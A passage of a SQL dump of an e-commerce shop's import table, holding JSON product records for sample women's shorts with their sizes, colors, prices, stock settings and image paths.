"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Orange\"},\"1898\":{\"sku\":\"WSH03-31-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-31-Blue\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-31-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Blue\"},\"1899\":{\"sku\":\"WSH03-31-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-31-Gray\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-31-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Gray\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(20, 'catalog_product', 'append', '{\"1900\":{\"sku\":\"WSH03-31-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-31-Orange\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-31-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Orange\"},\"1901\":{\"sku\":\"WSH03-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-32-Blue\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"1902\":{\"sku\":\"WSH03-32-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-32-Gray\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-32-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Gray\"},\"1903\":{\"sku\":\"WSH03-32-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-32-Orange\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-32-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Orange\"},\"1904\":{\"sku\":\"WSH03\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic|Snug|Base Layer,material=LumaTech&trade;|Organic Cotton,pattern=Solid,climate=All-weather|Indoor|Hot,eco_collection=Yes,performance_fabric=Yes,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH03-28-Blue,size=28,color=Blue|sku=WSH03-28-Gray,size=28,color=Gray|sku=WSH03-28-Orange,size=28,color=Orange|sku=WSH03-29-Blue,size=29,color=Blue|sku=WSH03-29-Gray,size=29,color=Gray|sku=WSH03-29-Orange,size=29,color=Orange|sku=WSH03-30-Blue,size=30,color=Blue|sku=WSH03-30-Gray,size=30,color=Gray|sku=WSH03-30-Orange,size=30,color=Orange|sku=WSH03-31-Blue,size=31,color=Blue|sku=WSH03-31-Gray,size=31,color=Gray|sku=WSH03-31-Orange,size=31,color=Orange|sku=WSH03-32-Blue,size=32,color=Blue|sku=WSH03-32-Gray,size=32,color=Gray|sku=WSH03-32-Orange,size=32,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic|Snug|Base Layer\",\"material\":\"LumaTech&trade;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Hot\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1905\":{\"sku\":\"WSH04-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-28-Black\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1906\":{\"sku\":\"WSH04-28-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-28-Green\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; 